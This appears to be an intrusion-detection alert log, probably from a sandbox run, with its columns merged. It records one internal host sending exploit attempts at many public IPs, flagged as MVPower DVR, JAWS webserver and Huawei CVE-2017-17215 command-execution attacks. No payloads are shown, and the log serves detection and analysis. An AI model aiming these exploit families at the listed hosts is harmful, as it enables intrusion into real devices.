                                                          192.168.2.23156.253.36.648376372152829579 01/02/24-06:24:16.442516TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4837637215192.168.2.23156.253.36.6
                                                          192.168.2.234.152.153.16453294802030092 01/02/24-06:23:55.535212TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5329480192.168.2.234.152.153.164
                                                          192.168.2.232.20.206.6947260802030092 01/02/24-06:25:06.855559TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4726080192.168.2.232.20.206.69
                                                          192.168.2.2369.192.43.5855492802025883 01/02/24-06:25:21.993012TCP2025883ET EXPLOIT MVPower DVR Shell UCE5549280192.168.2.2369.192.43.58
                                                          192.168.2.23156.254.75.5454612372152829579 01/02/24-06:25:31.710967TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5461237215192.168.2.23156.254.75.54
                                                          192.168.2.2399.16.143.12833176802025883 01/02/24-06:24:14.071830TCP2025883ET EXPLOIT MVPower DVR Shell UCE3317680192.168.2.2399.16.143.128
                                                          192.168.2.235.135.156.633424802030092 01/02/24-06:25:30.155873TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3342480192.168.2.235.135.156.6
                                                          192.168.2.2385.221.227.12437694802030092 01/02/24-06:24:18.042374TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3769480192.168.2.2385.221.227.124
                                                          192.168.2.23167.172.137.11148674802025883 01/02/24-06:23:49.370306TCP2025883ET EXPLOIT MVPower DVR Shell UCE4867480192.168.2.23167.172.137.111
                                                          192.168.2.23154.214.96.7060798802030092 01/02/24-06:24:05.858026TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6079880192.168.2.23154.214.96.70
                                                          192.168.2.2324.90.220.12451082802030092 01/02/24-06:25:34.883177TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5108280192.168.2.2324.90.220.124
                                                          192.168.2.2346.4.102.25247674802025883 01/02/24-06:25:43.105983TCP2025883ET EXPLOIT MVPower DVR Shell UCE4767480192.168.2.2346.4.102.252
                                                          192.168.2.2323.204.125.10656392802025883 01/02/24-06:24:13.920039TCP2025883ET EXPLOIT MVPower DVR Shell UCE5639280192.168.2.2323.204.125.106
                                                          192.168.2.23173.234.100.23044204802025883 01/02/24-06:24:40.616364TCP2025883ET EXPLOIT MVPower DVR Shell UCE4420480192.168.2.23173.234.100.230
                                                          192.168.2.23185.18.81.6639906802025883 01/02/24-06:25:01.307707TCP2025883ET EXPLOIT MVPower DVR Shell UCE3990680192.168.2.23185.18.81.66
                                                          192.168.2.23118.232.97.5137750802025883 01/02/24-06:24:56.010020TCP2025883ET EXPLOIT MVPower DVR Shell UCE3775080192.168.2.23118.232.97.51
                                                          192.168.2.238.134.23.4358860802025883 01/02/24-06:24:27.781954TCP2025883ET EXPLOIT MVPower DVR Shell UCE5886080192.168.2.238.134.23.43
                                                          192.168.2.23213.136.91.1739410802025883 01/02/24-06:24:04.299968TCP2025883ET EXPLOIT MVPower DVR Shell UCE3941080192.168.2.23213.136.91.17
                                                          192.168.2.23164.132.227.17152970802025883 01/02/24-06:25:19.078205TCP2025883ET EXPLOIT MVPower DVR Shell UCE5297080192.168.2.23164.132.227.171
                                                          192.168.2.23110.161.237.5746168802030092 01/02/24-06:25:25.756167TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4616880192.168.2.23110.161.237.57
                                                          192.168.2.2318.164.18.3348318802030092 01/02/24-06:25:38.054989TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4831880192.168.2.2318.164.18.33
                                                          192.168.2.2335.209.88.19054520802025883 01/02/24-06:24:45.913931TCP2025883ET EXPLOIT MVPower DVR Shell UCE5452080192.168.2.2335.209.88.190
                                                          192.168.2.2359.49.86.22544734802025883 01/02/24-06:24:27.489026TCP2025883ET EXPLOIT MVPower DVR Shell UCE4473480192.168.2.2359.49.86.225
                                                          192.168.2.23103.131.18.24355884802025883 01/02/24-06:25:21.511351TCP2025883ET EXPLOIT MVPower DVR Shell UCE5588480192.168.2.23103.131.18.243
                                                          192.168.2.23108.186.216.18145040802030092 01/02/24-06:23:51.959819TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4504080192.168.2.23108.186.216.181
                                                          192.168.2.2350.87.38.1737480802025883 01/02/24-06:24:23.653878TCP2025883ET EXPLOIT MVPower DVR Shell UCE3748080192.168.2.2350.87.38.17
                                                          192.168.2.23104.86.91.9035656802030092 01/02/24-06:24:50.099510TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3565680192.168.2.23104.86.91.90
                                                          192.168.2.2385.215.117.2442578802025883 01/02/24-06:24:01.338021TCP2025883ET EXPLOIT MVPower DVR Shell UCE4257880192.168.2.2385.215.117.24
                                                          192.168.2.2389.212.109.24042828802025883 01/02/24-06:24:42.987046TCP2025883ET EXPLOIT MVPower DVR Shell UCE4282880192.168.2.2389.212.109.240
                                                          192.168.2.23152.200.138.8146794802030092 01/02/24-06:24:51.767454TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4679480192.168.2.23152.200.138.81
                                                          192.168.2.23144.126.206.15750982802030092 01/02/24-06:24:28.177953TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5098280192.168.2.23144.126.206.157
                                                          192.168.2.2327.54.141.22460562802025883 01/02/24-06:24:30.783293TCP2025883ET EXPLOIT MVPower DVR Shell UCE6056280192.168.2.2327.54.141.224
                                                          192.168.2.2351.255.91.12053876802030092 01/02/24-06:25:02.258701TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5387680192.168.2.2351.255.91.120
                                                          192.168.2.23108.158.129.15660976802030092 01/02/24-06:24:55.937734TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6097680192.168.2.23108.158.129.156
                                                          192.168.2.2359.151.128.1748314802030092 01/02/24-06:24:46.386584TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4831480192.168.2.2359.151.128.17
                                                          192.168.2.2374.39.214.2346062802030092 01/02/24-06:25:15.627181TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4606280192.168.2.2374.39.214.23
                                                          192.168.2.2357.180.62.6834572802025883 01/02/24-06:24:44.984670TCP2025883ET EXPLOIT MVPower DVR Shell UCE3457280192.168.2.2357.180.62.68
                                                          192.168.2.2351.75.21.17840480802030092 01/02/24-06:25:02.016731TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4048080192.168.2.2351.75.21.178
                                                          192.168.2.238.217.69.18058726802030092 01/02/24-06:24:01.420268TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5872680192.168.2.238.217.69.180
                                                          192.168.2.2386.107.30.11541714802025883 01/02/24-06:25:35.089932TCP2025883ET EXPLOIT MVPower DVR Shell UCE4171480192.168.2.2386.107.30.115
                                                          192.168.2.2391.194.11.19152908802030092 01/02/24-06:24:17.758398TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5290880192.168.2.2391.194.11.191
                                                          192.168.2.23154.204.118.16159748802025883 01/02/24-06:24:50.106168TCP2025883ET EXPLOIT MVPower DVR Shell UCE5974880192.168.2.23154.204.118.161
                                                          192.168.2.2394.152.11.20858652802030092 01/02/24-06:25:38.297923TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5865280192.168.2.2394.152.11.208
                                                          192.168.2.2313.52.177.10058232802025883 01/02/24-06:24:00.958032TCP2025883ET EXPLOIT MVPower DVR Shell UCE5823280192.168.2.2313.52.177.100
                                                          192.168.2.23206.233.253.22452608802030092 01/02/24-06:24:09.052927TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5260880192.168.2.23206.233.253.224
                                                          192.168.2.2323.209.26.22960854802030092 01/02/24-06:24:32.802584TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6085480192.168.2.2323.209.26.229
                                                          192.168.2.23207.91.250.5347036802025883 01/02/24-06:24:05.701901TCP2025883ET EXPLOIT MVPower DVR Shell UCE4703680192.168.2.23207.91.250.53
                                                          192.168.2.23195.210.122.20639926802030092 01/02/24-06:25:42.425489TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3992680192.168.2.23195.210.122.206
                                                          192.168.2.2389.116.58.16258488802030092 01/02/24-06:24:18.153621TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5848880192.168.2.2389.116.58.162
                                                          192.168.2.2338.55.6.5853198802030092 01/02/24-06:25:09.906087TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5319880192.168.2.2338.55.6.58
                                                          192.168.2.23185.124.143.18839152802030092 01/02/24-06:23:52.102637TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3915280192.168.2.23185.124.143.188
                                                          192.168.2.2334.88.138.1944478802025883 01/02/24-06:25:30.159443TCP2025883ET EXPLOIT MVPower DVR Shell UCE4447880192.168.2.2334.88.138.19
                                                          192.168.2.23107.167.54.15750366802025883 01/02/24-06:25:31.230783TCP2025883ET EXPLOIT MVPower DVR Shell UCE5036680192.168.2.23107.167.54.157
                                                          192.168.2.23121.36.115.24947442802030092 01/02/24-06:23:55.420371TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4744280192.168.2.23121.36.115.249
                                                          192.168.2.2351.17.132.4749620802030092 01/02/24-06:24:34.942338TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4962080192.168.2.2351.17.132.47
                                                          192.168.2.23155.159.137.860496802030092 01/02/24-06:24:33.306234TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6049680192.168.2.23155.159.137.8
                                                          192.168.2.23209.97.134.8644200802030092 01/02/24-06:24:43.211070TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4420080192.168.2.23209.97.134.86
                                                          192.168.2.23146.126.59.11357290802030092 01/02/24-06:24:34.936317TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5729080192.168.2.23146.126.59.113
                                                          192.168.2.2368.233.96.13258694802030092 01/02/24-06:25:19.392967TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5869480192.168.2.2368.233.96.132
                                                          192.168.2.23176.119.158.21950988802030092 01/02/24-06:24:35.189037TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5098880192.168.2.23176.119.158.219
                                                          192.168.2.2391.146.142.15155428802025883 01/02/24-06:24:27.710944TCP2025883ET EXPLOIT MVPower DVR Shell UCE5542880192.168.2.2391.146.142.151
                                                          192.168.2.23116.202.207.17543532802030092 01/02/24-06:24:40.704654TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4353280192.168.2.23116.202.207.175
                                                          192.168.2.2341.47.14.14559648802025883 01/02/24-06:24:55.990421TCP2025883ET EXPLOIT MVPower DVR Shell UCE5964880192.168.2.2341.47.14.145
                                                          192.168.2.2320.47.19.11445826802025883 01/02/24-06:23:56.133253TCP2025883ET EXPLOIT MVPower DVR Shell UCE4582680192.168.2.2320.47.19.114
                                                          192.168.2.2351.210.89.5356836802030092 01/02/24-06:25:38.038524TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5683680192.168.2.2351.210.89.53
                                                          192.168.2.23116.203.70.2860376802030092 01/02/24-06:23:52.035635TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6037680192.168.2.23116.203.70.28
                                                          192.168.2.23198.204.78.11558122802030092 01/02/24-06:24:30.686985TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5812280192.168.2.23198.204.78.115
                                                          192.168.2.23119.77.165.6058400802030092 01/02/24-06:23:55.158684TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5840080192.168.2.23119.77.165.60
                                                          192.168.2.2323.63.254.14947840802030092 01/02/24-06:25:42.582550TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4784080192.168.2.2323.63.254.149
                                                          192.168.2.23104.82.158.9850494802030092 01/02/24-06:24:08.856573TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5049480192.168.2.23104.82.158.98
                                                          192.168.2.2343.192.122.6537722802030092 01/02/24-06:25:42.403229TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3772280192.168.2.2343.192.122.65
                                                          192.168.2.2320.94.161.14533044802030092 01/02/24-06:24:17.563871TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3304480192.168.2.2320.94.161.145
                                                          192.168.2.2347.95.228.7335778802025883 01/02/24-06:24:59.105890TCP2025883ET EXPLOIT MVPower DVR Shell UCE3577880192.168.2.2347.95.228.73
                                                          192.168.2.235.217.184.7845324802030092 01/02/24-06:25:15.076575TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4532480192.168.2.235.217.184.78
                                                          192.168.2.23156.254.98.9037532372152835222 01/02/24-06:23:56.031360TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3753237215192.168.2.23156.254.98.90
                                                          192.168.2.2320.65.30.21242196802030092 01/02/24-06:25:03.828276TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4219680192.168.2.2320.65.30.212
                                                          192.168.2.23104.121.24.21239268802025883 01/02/24-06:25:34.772506TCP2025883ET EXPLOIT MVPower DVR Shell UCE3926880192.168.2.23104.121.24.212
                                                          192.168.2.23200.159.177.3149306802030092 01/02/24-06:24:11.224156TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4930680192.168.2.23200.159.177.31
                                                          192.168.2.2366.78.59.10240712802030092 01/02/24-06:25:15.619279TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4071280192.168.2.2366.78.59.102
                                                          192.168.2.23178.128.227.10941330802025883 01/02/24-06:25:25.911068TCP2025883ET EXPLOIT MVPower DVR Shell UCE4133080192.168.2.23178.128.227.109
                                                          192.168.2.23197.26.123.21538682802025883 01/02/24-06:25:36.163559TCP2025883ET EXPLOIT MVPower DVR Shell UCE3868280192.168.2.23197.26.123.215
                                                          192.168.2.23160.242.101.24957992802025883 01/02/24-06:24:49.569096TCP2025883ET EXPLOIT MVPower DVR Shell UCE5799280192.168.2.23160.242.101.249
                                                          192.168.2.23104.23.98.20438590802025883 01/02/24-06:24:01.079300TCP2025883ET EXPLOIT MVPower DVR Shell UCE3859080192.168.2.23104.23.98.204
                                                          192.168.2.2338.3.104.6048300802025883 01/02/24-06:25:07.011141TCP2025883ET EXPLOIT MVPower DVR Shell UCE4830080192.168.2.2338.3.104.60
                                                          192.168.2.23184.27.51.3257188802025883 01/02/24-06:25:35.366173TCP2025883ET EXPLOIT MVPower DVR Shell UCE5718880192.168.2.23184.27.51.32
                                                          192.168.2.2350.199.186.2553794802030092 01/02/24-06:24:08.558341TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5379480192.168.2.2350.199.186.25
                                                          192.168.2.23104.76.96.2160320802025883 01/02/24-06:25:15.761034TCP2025883ET EXPLOIT MVPower DVR Shell UCE6032080192.168.2.23104.76.96.21
                                                          192.168.2.23162.243.164.3647712802030092 01/02/24-06:25:00.919883TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4771280192.168.2.23162.243.164.36
                                                          192.168.2.23104.25.41.24933472802025883 01/02/24-06:24:01.079195TCP2025883ET EXPLOIT MVPower DVR Shell UCE3347280192.168.2.23104.25.41.249
                                                          192.168.2.23212.40.8.18758620802025883 01/02/24-06:24:23.995468TCP2025883ET EXPLOIT MVPower DVR Shell UCE5862080192.168.2.23212.40.8.187
                                                          192.168.2.23104.100.195.10552802802030092 01/02/24-06:25:15.214192TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5280280192.168.2.23104.100.195.105
                                                          192.168.2.23167.82.120.6646464802025883 01/02/24-06:24:27.487383TCP2025883ET EXPLOIT MVPower DVR Shell UCE4646480192.168.2.23167.82.120.66
                                                          192.168.2.23190.77.152.21653296802025883 01/02/24-06:25:16.037354TCP2025883ET EXPLOIT MVPower DVR Shell UCE5329680192.168.2.23190.77.152.216
                                                          192.168.2.2320.72.240.21243978802025883 01/02/24-06:24:23.654334TCP2025883ET EXPLOIT MVPower DVR Shell UCE4397880192.168.2.2320.72.240.212
                                                          192.168.2.2323.15.103.2141670802030092 01/02/24-06:25:31.414284TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4167080192.168.2.2323.15.103.21
                                                          192.168.2.23175.29.154.10159250802030092 01/02/24-06:24:03.503193TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5925080192.168.2.23175.29.154.101
                                                          192.168.2.2367.207.70.10055198802030092 01/02/24-06:23:52.032969TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5519880192.168.2.2367.207.70.100
                                                          192.168.2.2338.181.35.21934232802025883 01/02/24-06:23:57.729740TCP2025883ET EXPLOIT MVPower DVR Shell UCE3423280192.168.2.2338.181.35.219
                                                          192.168.2.2391.215.216.4359224802030092 01/02/24-06:23:50.494104TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5922480192.168.2.2391.215.216.43
                                                          192.168.2.23173.246.114.1738990802025883 01/02/24-06:24:15.084514TCP2025883ET EXPLOIT MVPower DVR Shell UCE3899080192.168.2.23173.246.114.17
                                                          192.168.2.23184.29.129.740722802025883 01/02/24-06:23:49.999892TCP2025883ET EXPLOIT MVPower DVR Shell UCE4072280192.168.2.23184.29.129.7
                                                          192.168.2.2394.237.51.5260554802025883 01/02/24-06:24:20.104130TCP2025883ET EXPLOIT MVPower DVR Shell UCE6055480192.168.2.2394.237.51.52
                                                          192.168.2.23156.254.100.15556258372152829579 01/02/24-06:24:45.346010TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5625837215192.168.2.23156.254.100.155
                                                          192.168.2.232.135.71.17637678802025883 01/02/24-06:24:11.112670TCP2025883ET EXPLOIT MVPower DVR Shell UCE3767880192.168.2.232.135.71.176
                                                          192.168.2.2398.4.73.1259564802025883 01/02/24-06:25:01.180668TCP2025883ET EXPLOIT MVPower DVR Shell UCE5956480192.168.2.2398.4.73.12
                                                          192.168.2.2368.68.1.22036644802030092 01/02/24-06:25:00.920491TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3664480192.168.2.2368.68.1.220
                                                          192.168.2.2335.160.3.14954360802025883 01/02/24-06:24:40.650599TCP2025883ET EXPLOIT MVPower DVR Shell UCE5436080192.168.2.2335.160.3.149
                                                          192.168.2.2343.225.210.1847296802030092 01/02/24-06:24:55.316812TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4729680192.168.2.2343.225.210.18
                                                          192.168.2.2323.7.184.25344448802030092 01/02/24-06:24:40.620372TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4444880192.168.2.2323.7.184.253
                                                          192.168.2.23154.216.168.7659634802025883 01/02/24-06:23:58.312912TCP2025883ET EXPLOIT MVPower DVR Shell UCE5963480192.168.2.23154.216.168.76
                                                          192.168.2.2344.237.242.20252038802025883 01/02/24-06:24:36.865314TCP2025883ET EXPLOIT MVPower DVR Shell UCE5203880192.168.2.2344.237.242.202
                                                          192.168.2.2331.41.88.1257330802025883 01/02/24-06:24:41.167214TCP2025883ET EXPLOIT MVPower DVR Shell UCE5733080192.168.2.2331.41.88.12
                                                          192.168.2.2335.211.249.21148824802025883 01/02/24-06:24:30.918981TCP2025883ET EXPLOIT MVPower DVR Shell UCE4882480192.168.2.2335.211.249.211
                                                          192.168.2.23172.67.227.649236802025883 01/02/24-06:24:30.712225TCP2025883ET EXPLOIT MVPower DVR Shell UCE4923680192.168.2.23172.67.227.6
                                                          192.168.2.2320.244.147.18357646802030092 01/02/24-06:24:58.867978TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5764680192.168.2.2320.244.147.183
                                                          192.168.2.23104.111.199.19550616802030092 01/02/24-06:24:14.253972TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5061680192.168.2.23104.111.199.195
                                                          192.168.2.235.201.189.18145518802025883 01/02/24-06:25:25.755860TCP2025883ET EXPLOIT MVPower DVR Shell UCE4551880192.168.2.235.201.189.181
                                                          192.168.2.2352.215.63.14354620802025883 01/02/24-06:25:02.012429TCP2025883ET EXPLOIT MVPower DVR Shell UCE5462080192.168.2.2352.215.63.143
                                                          192.168.2.23104.81.147.8654666802030092 01/02/24-06:23:51.956424TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5466680192.168.2.23104.81.147.86
                                                          192.168.2.2323.194.49.1647606802025883 01/02/24-06:24:41.187072TCP2025883ET EXPLOIT MVPower DVR Shell UCE4760680192.168.2.2323.194.49.16
                                                          192.168.2.23147.161.173.436874802025883 01/02/24-06:24:27.401967TCP2025883ET EXPLOIT MVPower DVR Shell UCE3687480192.168.2.23147.161.173.4
                                                          192.168.2.23156.235.99.3048078372152835222 01/02/24-06:25:03.497384TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4807837215192.168.2.23156.235.99.30
                                                          192.168.2.23202.75.28.17559818802030092 01/02/24-06:24:09.284359TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5981880192.168.2.23202.75.28.175
                                                          192.168.2.2318.182.204.24235596802030092 01/02/24-06:25:43.130381TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3559680192.168.2.2318.182.204.242
                                                          192.168.2.2313.55.87.22949346802030092 01/02/24-06:24:15.126337TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4934680192.168.2.2313.55.87.229
                                                          192.168.2.23172.121.35.8032926802025883 01/02/24-06:23:50.004340TCP2025883ET EXPLOIT MVPower DVR Shell UCE3292680192.168.2.23172.121.35.80
                                                          192.168.2.23103.204.176.20545228802025883 01/02/24-06:24:18.853608TCP2025883ET EXPLOIT MVPower DVR Shell UCE4522880192.168.2.23103.204.176.205
                                                          192.168.2.23104.230.152.22550120802025883 01/02/24-06:24:30.618084TCP2025883ET EXPLOIT MVPower DVR Shell UCE5012080192.168.2.23104.230.152.225
                                                          192.168.2.2323.37.171.10453882802030092 01/02/24-06:24:30.942227TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5388280192.168.2.2323.37.171.104
                                                          192.168.2.23209.212.159.21533838802030092 01/02/24-06:25:09.542471TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3383880192.168.2.23209.212.159.215
                                                          192.168.2.23117.52.81.22652076802025883 01/02/24-06:25:30.193653TCP2025883ET EXPLOIT MVPower DVR Shell UCE5207680192.168.2.23117.52.81.226
                                                          192.168.2.2391.200.67.11059548802025883 01/02/24-06:24:19.258178TCP2025883ET EXPLOIT MVPower DVR Shell UCE5954880192.168.2.2391.200.67.110
                                                          192.168.2.2320.44.122.13056304802030092 01/02/24-06:24:35.077411TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5630480192.168.2.2320.44.122.130
                                                          192.168.2.2313.250.225.1660966802030092 01/02/24-06:24:43.065656TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6096680192.168.2.2313.250.225.16
                                                          192.168.2.2318.176.244.12750336802030092 01/02/24-06:24:45.251137TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5033680192.168.2.2318.176.244.127
                                                          192.168.2.23104.107.146.11748156802025883 01/02/24-06:24:01.091302TCP2025883ET EXPLOIT MVPower DVR Shell UCE4815680192.168.2.23104.107.146.117
                                                          192.168.2.23200.52.65.8038840802025883 01/02/24-06:25:07.011268TCP2025883ET EXPLOIT MVPower DVR Shell UCE3884080192.168.2.23200.52.65.80
                                                          192.168.2.2323.214.139.1748916802025883 01/02/24-06:24:08.852245TCP2025883ET EXPLOIT MVPower DVR Shell UCE4891680192.168.2.2323.214.139.17
                                                          192.168.2.2395.101.194.5540702802025883 01/02/24-06:25:10.079630TCP2025883ET EXPLOIT MVPower DVR Shell UCE4070280192.168.2.2395.101.194.55
                                                          192.168.2.23186.39.8.7359120802025883 01/02/24-06:25:19.095834TCP2025883ET EXPLOIT MVPower DVR Shell UCE5912080192.168.2.23186.39.8.73
                                                          192.168.2.23194.29.100.3746672802030092 01/02/24-06:24:49.045138TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4667280192.168.2.23194.29.100.37
                                                          192.168.2.23205.186.128.848982802025883 01/02/24-06:24:27.336199TCP2025883ET EXPLOIT MVPower DVR Shell UCE4898280192.168.2.23205.186.128.8
                                                          192.168.2.2377.129.5.23550818802030092 01/02/24-06:25:29.681948TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5081880192.168.2.2377.129.5.235
                                                          192.168.2.2346.4.186.23653184802025883 01/02/24-06:24:54.906257TCP2025883ET EXPLOIT MVPower DVR Shell UCE5318480192.168.2.2346.4.186.236
                                                          192.168.2.23197.15.56.18050906802025883 01/02/24-06:24:01.084128TCP2025883ET EXPLOIT MVPower DVR Shell UCE5090680192.168.2.23197.15.56.180
                                                          192.168.2.23206.238.103.10546650802030092 01/02/24-06:24:08.700707TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4665080192.168.2.23206.238.103.105
                                                          192.168.2.23115.110.175.3654248802030092 01/02/24-06:25:42.911184TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5424880192.168.2.23115.110.175.36
                                                          192.168.2.2343.175.236.10258804802030092 01/02/24-06:25:44.028517TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5880480192.168.2.2343.175.236.102
                                                          192.168.2.2387.123.31.16541088802025883 01/02/24-06:24:24.186617TCP2025883ET EXPLOIT MVPower DVR Shell UCE4108880192.168.2.2387.123.31.165
                                                          192.168.2.23129.21.35.14555408802030092 01/02/24-06:24:59.028627TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5540880192.168.2.23129.21.35.145
                                                          192.168.2.23104.252.147.12855178802025883 01/02/24-06:25:35.867202TCP2025883ET EXPLOIT MVPower DVR Shell UCE5517880192.168.2.23104.252.147.128
                                                          192.168.2.231.214.84.941418802030092 01/02/24-06:25:32.217582TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4141880192.168.2.231.214.84.9
                                                          192.168.2.2345.11.236.14242078802030092 01/02/24-06:24:59.115435TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4207880192.168.2.2345.11.236.142
                                                          192.168.2.2362.146.189.2848810802030092 01/02/24-06:25:38.026986TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4881080192.168.2.2362.146.189.28
                                                          192.168.2.2352.66.124.19643216802030092 01/02/24-06:24:31.144023TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4321680192.168.2.2352.66.124.196
                                                          192.168.2.2390.186.147.7442050802025883 01/02/24-06:24:54.920917TCP2025883ET EXPLOIT MVPower DVR Shell UCE4205080192.168.2.2390.186.147.74
                                                          192.168.2.23104.27.61.23650004802025883 01/02/24-06:24:48.847612TCP2025883ET EXPLOIT MVPower DVR Shell UCE5000480192.168.2.23104.27.61.236
                                                          192.168.2.2343.225.210.1847310802025883 01/02/24-06:24:55.583858TCP2025883ET EXPLOIT MVPower DVR Shell UCE4731080192.168.2.2343.225.210.18
                                                          192.168.2.23156.235.102.23453884372152829579 01/02/24-06:24:34.990700TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5388437215192.168.2.23156.235.102.234
                                                          192.168.2.23198.44.248.10442602802025883 01/02/24-06:24:27.798165TCP2025883ET EXPLOIT MVPower DVR Shell UCE4260280192.168.2.23198.44.248.104
                                                          192.168.2.2377.74.207.20352380802030092 01/02/24-06:25:35.073405TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5238080192.168.2.2377.74.207.203
                                                          192.168.2.2313.250.65.9258572802025883 01/02/24-06:25:21.541317TCP2025883ET EXPLOIT MVPower DVR Shell UCE5857280192.168.2.2313.250.65.92
                                                          192.168.2.23130.211.15.9540968802025883 01/02/24-06:23:49.492483TCP2025883ET EXPLOIT MVPower DVR Shell UCE4096880192.168.2.23130.211.15.95
                                                          192.168.2.232.182.153.6248988802025883 01/02/24-06:24:24.372962TCP2025883ET EXPLOIT MVPower DVR Shell UCE4898880192.168.2.232.182.153.62
                                                          192.168.2.232.189.137.1749444802025883 01/02/24-06:25:04.484177TCP2025883ET EXPLOIT MVPower DVR Shell UCE4944480192.168.2.232.189.137.17
                                                          192.168.2.2335.211.213.10757532802030092 01/02/24-06:25:37.947175TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5753280192.168.2.2335.211.213.107
                                                          192.168.2.23198.12.222.11345034802030092 01/02/24-06:24:58.944478TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4503480192.168.2.23198.12.222.113
                                                          192.168.2.2389.218.57.12838636802030092 01/02/24-06:23:50.310617TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3863680192.168.2.2389.218.57.128
                                                          192.168.2.23218.35.171.23047210802025883 01/02/24-06:24:23.810086TCP2025883ET EXPLOIT MVPower DVR Shell UCE4721080192.168.2.23218.35.171.230
